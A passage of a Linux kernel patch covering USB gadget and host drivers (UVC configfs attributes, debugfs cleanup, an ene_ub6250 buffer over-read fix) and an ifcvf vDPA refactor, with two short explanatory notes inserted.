++						    char *page)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	result = sprintf(page, "%u\n", le8_to_cpu(cd->bSourceID));
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return result;
++}
++
++static ssize_t uvcg_default_output_b_source_id_store(struct config_item *item,
++						     const char *page, size_t len)
++{
++	struct config_group *group = to_config_group(item);
++	struct f_uvc_opts *opts;
++	struct config_item *opts_item;
++	struct mutex *su_mutex = &group->cg_subsys->su_mutex;
++	struct uvc_output_terminal_descriptor *cd;
++	int result;
++	u8 num;
++
++	result = kstrtou8(page, 0, &num);
++	if (result)
++		return result;
++
++	mutex_lock(su_mutex); /* for navigating configfs hierarchy */
++
++	opts_item = group->cg_item.ci_parent->ci_parent->
++			ci_parent->ci_parent;
++	opts = to_f_uvc_opts(opts_item);
++	cd = &opts->uvc_output_terminal;
++
++	mutex_lock(&opts->lock);
++	cd->bSourceID = num;
++	mutex_unlock(&opts->lock);
++
++	mutex_unlock(su_mutex);
++
++	return len;
++}
++UVC_ATTR(uvcg_default_output_, b_source_id, bSourceID);
++
+ static struct configfs_attribute *uvcg_default_output_attrs[] = {
+ 	&uvcg_default_output_attr_b_terminal_id,
+ 	&uvcg_default_output_attr_w_terminal_type,
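[editor's note] The UVC gadget change promotes bSourceID from the read-only attribute macro to a hand-written show/store pair so userspace can rewire the output terminal. The store side follows the usual configfs recipe: parse first with kstrtou8() (rejecting bad input before any locks are taken), then update the descriptor under opts->lock. Parsing sketch, kernel-context:

u8 num;
int result = kstrtou8(page, 0, &num);	/* base 0: accepts 10, 0x0a, 012 */
if (result)
	return result;	/* -EINVAL or -ERANGE, nothing modified */

mutex_lock(&opts->lock);
cd->bSourceID = num;
mutex_unlock(&opts->lock);
return len;	/* configfs stores return the length consumed */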
+diff --git a/drivers/usb/gadget/udc/bcm63xx_udc.c b/drivers/usb/gadget/udc/bcm63xx_udc.c
+index d04d72f5816e6..8d58928913007 100644
+--- a/drivers/usb/gadget/udc/bcm63xx_udc.c
++++ b/drivers/usb/gadget/udc/bcm63xx_udc.c
+@@ -2258,7 +2258,7 @@ static void bcm63xx_udc_init_debugfs(struct bcm63xx_udc *udc)
+  */
+ static void bcm63xx_udc_cleanup_debugfs(struct bcm63xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ /***********************************************************************
+diff --git a/drivers/usb/gadget/udc/gr_udc.c b/drivers/usb/gadget/udc/gr_udc.c
+index 85cdc0af3bf95..09762559912d3 100644
+--- a/drivers/usb/gadget/udc/gr_udc.c
++++ b/drivers/usb/gadget/udc/gr_udc.c
+@@ -215,7 +215,7 @@ static void gr_dfs_create(struct gr_udc *dev)
+ 
+ static void gr_dfs_delete(struct gr_udc *dev)
+ {
+-	debugfs_remove(debugfs_lookup(dev_name(dev->dev), usb_debug_root));
++	debugfs_lookup_and_remove(dev_name(dev->dev), usb_debug_root);
+ }
+ 
+ #else /* !CONFIG_USB_GADGET_DEBUG_FS */
+diff --git a/drivers/usb/gadget/udc/lpc32xx_udc.c b/drivers/usb/gadget/udc/lpc32xx_udc.c
+index cea10cdb83ae5..fe62db32dd0eb 100644
+--- a/drivers/usb/gadget/udc/lpc32xx_udc.c
++++ b/drivers/usb/gadget/udc/lpc32xx_udc.c
+@@ -532,7 +532,7 @@ static void create_debug_file(struct lpc32xx_udc *udc)
+ 
+ static void remove_debug_file(struct lpc32xx_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(debug_filename, NULL));
++	debugfs_lookup_and_remove(debug_filename, NULL);
+ }
+ 
+ #else
+diff --git a/drivers/usb/gadget/udc/pxa25x_udc.c b/drivers/usb/gadget/udc/pxa25x_udc.c
+index c593fc383481e..9e01ddf2b4170 100644
+--- a/drivers/usb/gadget/udc/pxa25x_udc.c
++++ b/drivers/usb/gadget/udc/pxa25x_udc.c
+@@ -1340,7 +1340,7 @@ DEFINE_SHOW_ATTRIBUTE(udc_debug);
+ 		debugfs_create_file(dev->gadget.name, \
+ 			S_IRUGO, NULL, dev, &udc_debug_fops); \
+ 	} while (0)
+-#define remove_debug_files(dev) debugfs_remove(debugfs_lookup(dev->gadget.name, NULL))
++#define remove_debug_files(dev) debugfs_lookup_and_remove(dev->gadget.name, NULL)
+ 
+ #else	/* !CONFIG_USB_GADGET_DEBUG_FILES */
+ 
+diff --git a/drivers/usb/gadget/udc/pxa27x_udc.c b/drivers/usb/gadget/udc/pxa27x_udc.c
+index ac980d6a47406..0ecdfd2ba9e9b 100644
+--- a/drivers/usb/gadget/udc/pxa27x_udc.c
++++ b/drivers/usb/gadget/udc/pxa27x_udc.c
+@@ -215,7 +215,7 @@ static void pxa_init_debugfs(struct pxa_udc *udc)
+ 
+ static void pxa_cleanup_debugfs(struct pxa_udc *udc)
+ {
+-	debugfs_remove(debugfs_lookup(udc->gadget.name, usb_debug_root));
++	debugfs_lookup_and_remove(udc->gadget.name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/fotg210-hcd.c b/drivers/usb/host/fotg210-hcd.c
+index 3d1dbcf4c0732..c4c1fbc12b4cd 100644
+--- a/drivers/usb/host/fotg210-hcd.c
++++ b/drivers/usb/host/fotg210-hcd.c
+@@ -862,7 +862,7 @@ static inline void remove_debug_files(struct fotg210_hcd *fotg210)
+ {
+ 	struct usb_bus *bus = &fotg210_to_hcd(fotg210)->self;
+ 
+-	debugfs_remove(debugfs_lookup(bus->bus_name, fotg210_debug_root));
++	debugfs_lookup_and_remove(bus->bus_name, fotg210_debug_root);
+ }
+ 
+ /* handshake - spin reading hc until handshake completes or fails
+diff --git a/drivers/usb/host/isp116x-hcd.c b/drivers/usb/host/isp116x-hcd.c
+index 4f564d71bb0bc..49ae01487af4d 100644
+--- a/drivers/usb/host/isp116x-hcd.c
++++ b/drivers/usb/host/isp116x-hcd.c
+@@ -1205,7 +1205,7 @@ static void create_debug_file(struct isp116x *isp116x)
+ 
+ static void remove_debug_file(struct isp116x *isp116x)
+ {
+-	debugfs_remove(debugfs_lookup(hcd_name, usb_debug_root));
++	debugfs_lookup_and_remove(hcd_name, usb_debug_root);
+ }
+ 
+ #else
+diff --git a/drivers/usb/host/isp1362-hcd.c b/drivers/usb/host/isp1362-hcd.c
+index 0e14d1d07709d..b0da143ef4be9 100644
+--- a/drivers/usb/host/isp1362-hcd.c
++++ b/drivers/usb/host/isp1362-hcd.c
+@@ -2170,7 +2170,7 @@ static void create_debug_file(struct isp1362_hcd *isp1362_hcd)
+ 
+ static void remove_debug_file(struct isp1362_hcd *isp1362_hcd)
+ {
+-	debugfs_remove(debugfs_lookup("isp1362", usb_debug_root));
++	debugfs_lookup_and_remove("isp1362", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/sl811-hcd.c b/drivers/usb/host/sl811-hcd.c
+index d206bd95c7bbc..b8b90eec91078 100644
+--- a/drivers/usb/host/sl811-hcd.c
++++ b/drivers/usb/host/sl811-hcd.c
+@@ -1501,7 +1501,7 @@ static void create_debug_file(struct sl811 *sl811)
+ 
+ static void remove_debug_file(struct sl811 *sl811)
+ {
+-	debugfs_remove(debugfs_lookup("sl811h", usb_debug_root));
++	debugfs_lookup_and_remove("sl811h", usb_debug_root);
+ }
+ 
+ /*-------------------------------------------------------------------------*/
+diff --git a/drivers/usb/host/uhci-hcd.c b/drivers/usb/host/uhci-hcd.c
+index c22b51af83fcb..7cdc2fa7c28fb 100644
+--- a/drivers/usb/host/uhci-hcd.c
++++ b/drivers/usb/host/uhci-hcd.c
+@@ -536,8 +536,8 @@ static void release_uhci(struct uhci_hcd *uhci)
+ 	uhci->is_initialized = 0;
+ 	spin_unlock_irq(&uhci->lock);
+ 
+-	debugfs_remove(debugfs_lookup(uhci_to_hcd(uhci)->self.bus_name,
+-				      uhci_debugfs_root));
++	debugfs_lookup_and_remove(uhci_to_hcd(uhci)->self.bus_name,
++				  uhci_debugfs_root);
+ 
+ 	for (i = 0; i < UHCI_NUM_SKELQH; i++)
+ 		uhci_free_qh(uhci, uhci->skelqh[i]);
+@@ -700,7 +700,7 @@ err_alloc_frame_cpu:
+ 			uhci->frame, uhci->frame_dma_handle);
+ 
+ err_alloc_frame:
+-	debugfs_remove(debugfs_lookup(hcd->self.bus_name, uhci_debugfs_root));
++	debugfs_lookup_and_remove(hcd->self.bus_name, uhci_debugfs_root);
+ 
+ 	return retval;
+ }
+diff --git a/drivers/usb/host/xhci-mvebu.c b/drivers/usb/host/xhci-mvebu.c
+index 60651a50770f9..87f1597a0e5ab 100644
+--- a/drivers/usb/host/xhci-mvebu.c
++++ b/drivers/usb/host/xhci-mvebu.c
+@@ -32,7 +32,7 @@ static void xhci_mvebu_mbus_config(void __iomem *base,
+ 
+ 	/* Program each DRAM CS in a seperate window */
+ 	for (win = 0; win < dram->num_cs; win++) {
+-		const struct mbus_dram_window *cs = dram->cs + win;
++		const struct mbus_dram_window *cs = &dram->cs[win];
+ 
+ 		writel(((cs->size - 1) & 0xffff0000) | (cs->mbus_attr << 8) |
+ 		       (dram->mbus_dram_target_id << 4) | 1,
+diff --git a/drivers/usb/storage/ene_ub6250.c b/drivers/usb/storage/ene_ub6250.c
+index 6012603f3630e..97c66c0d91f4d 100644
+--- a/drivers/usb/storage/ene_ub6250.c
++++ b/drivers/usb/storage/ene_ub6250.c
+@@ -939,7 +939,7 @@ static int ms_lib_process_bootblock(struct us_data *us, u16 PhyBlock, u8 *PageDa
+ 	struct ms_lib_type_extdat ExtraData;
+ 	struct ene_ub6250_info *info = (struct ene_ub6250_info *) us->extra;
+ 
+-	PageBuffer = kmalloc(MS_BYTES_PER_PAGE, GFP_KERNEL);
++	PageBuffer = kzalloc(MS_BYTES_PER_PAGE * 2, GFP_KERNEL);
+ 	if (PageBuffer == NULL)
+ 		return (u32)-1;
+ 
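[editor's note] The ene_ub6250 change is an over-read containment fix: the boot-block parser can read past MS_BYTES_PER_PAGE, so the buffer is doubled and allocated zeroed, making any bytes the device never fills read back as zero instead of exposing stale heap contents:

/* old */ PageBuffer = kmalloc(MS_BYTES_PER_PAGE, GFP_KERNEL);
/* new */ PageBuffer = kzalloc(MS_BYTES_PER_PAGE * 2, GFP_KERNEL);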
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.c b/drivers/vdpa/ifcvf/ifcvf_base.c
+index 3e4486bfa0b71..3ec5ca3aefe1d 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.c
++++ b/drivers/vdpa/ifcvf/ifcvf_base.c
+@@ -10,11 +10,6 @@
+ 
+ #include "ifcvf_base.h"
+ 
+-struct ifcvf_adapter *vf_to_adapter(struct ifcvf_hw *hw)
+-{
+-	return container_of(hw, struct ifcvf_adapter, vf);
+-}
+-
+ u16 ifcvf_set_vq_vector(struct ifcvf_hw *hw, u16 qid, int vector)
+ {
+ 	struct virtio_pci_common_cfg __iomem *cfg = hw->common_cfg;
+@@ -37,8 +32,6 @@ u16 ifcvf_set_config_vector(struct ifcvf_hw *hw, int vector)
+ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 				  struct virtio_pci_cap *cap)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-	struct pci_dev *pdev;
+ 	u32 length, offset;
+ 	u8 bar;
+ 
+@@ -46,17 +39,14 @@ static void __iomem *get_cap_addr(struct ifcvf_hw *hw,
+ 	offset = le32_to_cpu(cap->offset);
+ 	bar = cap->bar;
+ 
+-	ifcvf= vf_to_adapter(hw);
+-	pdev = ifcvf->pdev;
+-
+ 	if (bar >= IFCVF_PCI_MAX_RESOURCE) {
+-		IFCVF_DBG(pdev,
++		IFCVF_DBG(hw->pdev,
+ 			  "Invalid bar number %u to get capabilities\n", bar);
+ 		return NULL;
+ 	}
+ 
+-	if (offset + length > pci_resource_len(pdev, bar)) {
+-		IFCVF_DBG(pdev,
++	if (offset + length > pci_resource_len(hw->pdev, bar)) {
++		IFCVF_DBG(hw->pdev,
+ 			  "offset(%u) + len(%u) overflows bar%u's capability\n",
+ 			  offset, length, bar);
+ 		return NULL;
+@@ -92,6 +82,7 @@ int ifcvf_init_hw(struct ifcvf_hw *hw, struct pci_dev *pdev)
+ 		IFCVF_ERR(pdev, "Failed to read PCI capability list\n");
+ 		return -EIO;
+ 	}
++	hw->pdev = pdev;
+ 
+ 	while (pos) {
+ 		ret = ifcvf_read_config_range(pdev, (u32 *)&cap,
+@@ -220,10 +211,8 @@ u64 ifcvf_get_features(struct ifcvf_hw *hw)
+ 
+ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ {
+-	struct ifcvf_adapter *ifcvf = vf_to_adapter(hw);
+-
+ 	if (!(features & BIT_ULL(VIRTIO_F_ACCESS_PLATFORM)) && features) {
+-		IFCVF_ERR(ifcvf->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
++		IFCVF_ERR(hw->pdev, "VIRTIO_F_ACCESS_PLATFORM is not negotiated\n");
+ 		return -EINVAL;
+ 	}
+ 
+@@ -232,13 +221,11 @@ int ifcvf_verify_min_features(struct ifcvf_hw *hw, u64 features)
+ 
+ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *adapter;
+ 	u32 net_config_size = sizeof(struct virtio_net_config);
+ 	u32 blk_config_size = sizeof(struct virtio_blk_config);
+ 	u32 cap_size = hw->cap_dev_config_size;
+ 	u32 config_size;
+ 
+-	adapter = vf_to_adapter(hw);
+ 	/* If the onboard device config space size is greater than
+ 	 * the size of struct virtio_net/blk_config, only the spec
+ 	 * implementing contents size is returned, this is very
+@@ -253,7 +240,7 @@ u32 ifcvf_get_config_size(struct ifcvf_hw *hw)
+ 		break;
+ 	default:
+ 		config_size = 0;
+-		IFCVF_ERR(adapter->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
++		IFCVF_ERR(hw->pdev, "VIRTIO ID %u not supported\n", hw->dev_type);
+ 	}
+ 
+ 	return config_size;
+@@ -301,14 +288,11 @@ static void ifcvf_set_features(struct ifcvf_hw *hw, u64 features)
+ 
+ static int ifcvf_config_features(struct ifcvf_hw *hw)
+ {
+-	struct ifcvf_adapter *ifcvf;
+-
+-	ifcvf = vf_to_adapter(hw);
+ 	ifcvf_set_features(hw, hw->req_features);
+ 	ifcvf_add_status(hw, VIRTIO_CONFIG_S_FEATURES_OK);
+ 
+ 	if (!(ifcvf_get_status(hw) & VIRTIO_CONFIG_S_FEATURES_OK)) {
+-		IFCVF_ERR(ifcvf->pdev, "Failed to set FEATURES_OK status\n");
++		IFCVF_ERR(hw->pdev, "Failed to set FEATURES_OK status\n");
+ 		return -EIO;
+ 	}
+ 
+diff --git a/drivers/vdpa/ifcvf/ifcvf_base.h b/drivers/vdpa/ifcvf/ifcvf_base.h
+index f5563f665cc62..25bd4e927b274 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_base.h
++++ b/drivers/vdpa/ifcvf/ifcvf_base.h
+@@ -39,7 +39,7 @@
+ #define IFCVF_INFO(pdev, fmt, ...)	dev_info(&pdev->dev, fmt, ##__VA_ARGS__)
+ 
+ #define ifcvf_private_to_vf(adapter) \
+-	(&((struct ifcvf_adapter *)adapter)->vf)
++	(((struct ifcvf_adapter *)adapter)->vf)
+ 
+ /* all vqs and config interrupt has its own vector */
+ #define MSIX_VECTOR_PER_VQ_AND_CONFIG		1
+@@ -89,12 +89,13 @@ struct ifcvf_hw {
+ 	u16 nr_vring;
+ 	/* VIRTIO_PCI_CAP_DEVICE_CFG size */
+ 	u32 cap_dev_config_size;
++	struct pci_dev *pdev;
+ };
+ 
+ struct ifcvf_adapter {
+ 	struct vdpa_device vdpa;
+ 	struct pci_dev *pdev;
+-	struct ifcvf_hw vf;
++	struct ifcvf_hw *vf;
+ };
+ 
+ struct ifcvf_vring_lm_cfg {
+@@ -109,6 +110,7 @@ struct ifcvf_lm_cfg {
+ 
+ struct ifcvf_vdpa_mgmt_dev {
+ 	struct vdpa_mgmt_dev mdev;
++	struct ifcvf_hw vf;
+ 	struct ifcvf_adapter *adapter;
+ 	struct pci_dev *pdev;
+ };
+diff --git a/drivers/vdpa/ifcvf/ifcvf_main.c b/drivers/vdpa/ifcvf/ifcvf_main.c
+index 44b29289aa193..d5036f49f161a 100644
+--- a/drivers/vdpa/ifcvf/ifcvf_main.c
++++ b/drivers/vdpa/ifcvf/ifcvf_main.c
+@@ -69,10 +69,9 @@ static void ifcvf_free_irq_vectors(void *data)
+ 	pci_free_irq_vectors(data);
+ }
+ 
+-static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i;
+ 
+ 	for (i = 0; i < vf->nr_vring; i++) {
+@@ -83,10 +82,9 @@ static void ifcvf_free_per_vq_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->vqs_reused_irq != -EINVAL) {
+ 		devm_free_irq(&pdev->dev, vf->vqs_reused_irq, vf);
+@@ -95,20 +93,17 @@ static void ifcvf_free_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ }
+ 
+-static void ifcvf_free_vq_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+-
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ifcvf_free_per_vq_irq(adapter);
++		ifcvf_free_per_vq_irq(vf);
+ 	else
+-		ifcvf_free_vqs_reused_irq(adapter);
++		ifcvf_free_vqs_reused_irq(vf);
+ }
+ 
+-static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 
+ 	if (vf->config_irq == -EINVAL)
+ 		return;
+@@ -123,12 +118,12 @@ static void ifcvf_free_config_irq(struct ifcvf_adapter *adapter)
+ 	}
+ }
+ 
+-static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
++static void ifcvf_free_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
++	struct pci_dev *pdev = vf->pdev;
+ 
+-	ifcvf_free_vq_irq(adapter);
+-	ifcvf_free_config_irq(adapter);
++	ifcvf_free_vq_irq(vf);
++	ifcvf_free_config_irq(vf);
+ 	ifcvf_free_irq_vectors(pdev);
+ }
+ 
+@@ -137,10 +132,9 @@ static void ifcvf_free_irq(struct ifcvf_adapter *adapter)
+  * It returns the number of allocated vectors, negative
+  * return value when fails.
+  */
+-static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
++static int ifcvf_alloc_vectors(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int max_intr, ret;
+ 
+ 	/* all queues and config interrupt  */
+@@ -160,10 +154,9 @@ static int ifcvf_alloc_vectors(struct ifcvf_adapter *adapter)
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_per_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vf->vqs_reused_irq = -EINVAL;
+@@ -190,15 +183,14 @@ static int ifcvf_request_per_vq_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vqs_reused_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -224,15 +216,14 @@ static int ifcvf_request_vqs_reused_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_dev_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int i, vector, ret, irq;
+ 
+ 	vector = 0;
+@@ -265,29 +256,27 @@ static int ifcvf_request_dev_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ 
+ }
+ 
+-static int ifcvf_request_vq_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_vq_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+-		ret = ifcvf_request_per_vq_irq(adapter);
++		ret = ifcvf_request_per_vq_irq(vf);
+ 	else
+-		ret = ifcvf_request_vqs_reused_irq(adapter);
++		ret = ifcvf_request_vqs_reused_irq(vf);
+ 
+ 	return ret;
+ }
+ 
+-static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_config_irq(struct ifcvf_hw *vf)
+ {
+-	struct pci_dev *pdev = adapter->pdev;
+-	struct ifcvf_hw *vf = &adapter->vf;
++	struct pci_dev *pdev = vf->pdev;
+ 	int config_vector, ret;
+ 
+ 	if (vf->msix_vector_status == MSIX_VECTOR_PER_VQ_AND_CONFIG)
+@@ -320,17 +309,16 @@ static int ifcvf_request_config_irq(struct ifcvf_adapter *adapter)
+ 
+ 	return 0;
+ err:
+-	ifcvf_free_irq(adapter);
++	ifcvf_free_irq(vf);
+ 
+ 	return -EFAULT;
+ }
+ 
+-static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
++static int ifcvf_request_irq(struct ifcvf_hw *vf)
+ {
+-	struct ifcvf_hw *vf = &adapter->vf;
+ 	int nvectors, ret, max_intr;
+ 
+-	nvectors = ifcvf_alloc_vectors(adapter);
++	nvectors = ifcvf_alloc_vectors(vf);
+ 	if (nvectors <= 0)
+ 		return -EFAULT;
+ 
+@@ -341,16 +329,16 @@ static int ifcvf_request_irq(struct ifcvf_adapter *adapter)
+ 
+ 	if (nvectors == 1) {
+ 		vf->msix_vector_status = MSIX_VECTOR_DEV_SHARED;
+-		ret = ifcvf_request_dev_irq(adapter);
++		ret = ifcvf_request_dev_irq(vf);
+ 
+ 		return ret;
+ 	}
+ 
+-	ret = ifcvf_request_vq_irq(adapter);
++	ret = ifcvf_request_vq_irq(vf);
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ifcvf_request_config_irq(adapter);
++	ret = ifcvf_request_config_irq(vf);
+ 
+ 	if (ret)
+ 		return ret;
+@@ -414,7 +402,7 @@ static struct ifcvf_hw *vdpa_to_vf(struct vdpa_device *vdpa_dev)
+ {
+ 	struct ifcvf_adapter *adapter = vdpa_to_adapter(vdpa_dev);
+ 
+-	return &adapter->vf;
++	return adapter->vf;
+ }
+ 
+ static u64 ifcvf_vdpa_get_device_features(struct vdpa_device *vdpa_dev)
+@@ -479,7 +467,7 @@ static void ifcvf_vdpa_set_status(struct vdpa_device *vdpa_dev, u8 status)
+ 
+ 	if ((status & VIRTIO_CONFIG_S_DRIVER_OK) &&
+ 	    !(status_old & VIRTIO_CONFIG_S_DRIVER_OK)) {
+-		ret = ifcvf_request_irq(adapter);
++		ret = ifcvf_request_irq(vf);
+ 		if (ret) {
+ 			status = ifcvf_get_status(vf);
+ 			status |= VIRTIO_CONFIG_S_FAILED;
+@@ -511,7 +499,7 @@ static int ifcvf_vdpa_reset(struct vdpa_device *vdpa_dev)
+ 
+ 	if (status_old & VIRTIO_CONFIG_S_DRIVER_OK) {
+ 		ifcvf_stop_datapath(adapter);
+-		ifcvf_free_irq(adapter);
++		ifcvf_free_irq(vf);
+ 	}
+ 
+ 	ifcvf_reset_vring(adapter);
+@@ -758,12 +746,20 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	int ret;
+ 
+ 	ifcvf_mgmt_dev = container_of(mdev, struct ifcvf_vdpa_mgmt_dev, mdev);
+-	if (!ifcvf_mgmt_dev->adapter)
+-		return -EOPNOTSUPP;
++	vf = &ifcvf_mgmt_dev->vf;
++	pdev = vf->pdev;
++	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
++				    &pdev->dev, &ifc_vdpa_ops, 1, 1, NULL, false);
++	if (IS_ERR(adapter)) {
++		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
++		return PTR_ERR(adapter);
++	}
+ 
+-	adapter = ifcvf_mgmt_dev->adapter;
+-	vf = &adapter->vf;
+-	pdev = adapter->pdev;
++	ifcvf_mgmt_dev->adapter = adapter;
++	adapter->pdev = pdev;
++	adapter->vdpa.dma_dev = &pdev->dev;
++	adapter->vdpa.mdev = mdev;
++	adapter->vf = vf;
+ 	vdpa_dev = &adapter->vdpa;
+ 
+ 	if (name)
+@@ -781,7 +777,6 @@ static int ifcvf_vdpa_dev_add(struct vdpa_mgmt_dev *mdev, const char *name,
+ 	return 0;
+ }
+ 
+-
+ static void ifcvf_vdpa_dev_del(struct vdpa_mgmt_dev *mdev, struct vdpa_device *dev)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+@@ -800,7 +795,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ {
+ 	struct ifcvf_vdpa_mgmt_dev *ifcvf_mgmt_dev;
+ 	struct device *dev = &pdev->dev;
+-	struct ifcvf_adapter *adapter;
+ 	struct ifcvf_hw *vf;
+ 	u32 dev_type;
+ 	int ret, i;
+@@ -831,20 +825,16 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	}
+ 
+ 	pci_set_master(pdev);
+-
+-	adapter = vdpa_alloc_device(struct ifcvf_adapter, vdpa,
+-				    dev, &ifc_vdpa_ops, 1, 1, NULL, false);
+-	if (IS_ERR(adapter)) {
+-		IFCVF_ERR(pdev, "Failed to allocate vDPA structure");
+-		return PTR_ERR(adapter);
++	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
++	if (!ifcvf_mgmt_dev) {
++		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
++		return -ENOMEM;
+ 	}
+ 
+-	vf = &adapter->vf;
++	vf = &ifcvf_mgmt_dev->vf;
+ 	vf->dev_type = get_dev_type(pdev);
+ 	vf->base = pcim_iomap_table(pdev);
+-
+-	adapter->pdev = pdev;
+-	adapter->vdpa.dma_dev = &pdev->dev;
++	vf->pdev = pdev;
+ 
+ 	ret = ifcvf_init_hw(vf, pdev);
+ 	if (ret) {
+@@ -858,16 +848,6 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 	vf->hw_features = ifcvf_get_hw_features(vf);
+ 	vf->config_size = ifcvf_get_config_size(vf);
+ 
+-	ifcvf_mgmt_dev = kzalloc(sizeof(struct ifcvf_vdpa_mgmt_dev), GFP_KERNEL);
+-	if (!ifcvf_mgmt_dev) {
+-		IFCVF_ERR(pdev, "Failed to alloc memory for the vDPA management device\n");
+-		return -ENOMEM;
+-	}
+-
+-	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
+-	ifcvf_mgmt_dev->mdev.device = dev;
+-	ifcvf_mgmt_dev->adapter = adapter;
+-
+ 	dev_type = get_dev_type(pdev);
+ 	switch (dev_type) {
+ 	case VIRTIO_ID_NET:
+@@ -882,12 +862,11 @@ static int ifcvf_probe(struct pci_dev *pdev, const struct pci_device_id *id)
+ 		goto err;
+ 	}
+ 
++	ifcvf_mgmt_dev->mdev.ops = &ifcvf_vdpa_mgmt_dev_ops;
++	ifcvf_mgmt_dev->mdev.device = dev;
+ 	ifcvf_mgmt_dev->mdev.max_supported_vqs = vf->nr_vring;
+ 	ifcvf_mgmt_dev->mdev.supported_features = vf->hw_features;
+ 
+-	adapter->vdpa.mdev = &ifcvf_mgmt_dev->mdev;
+-
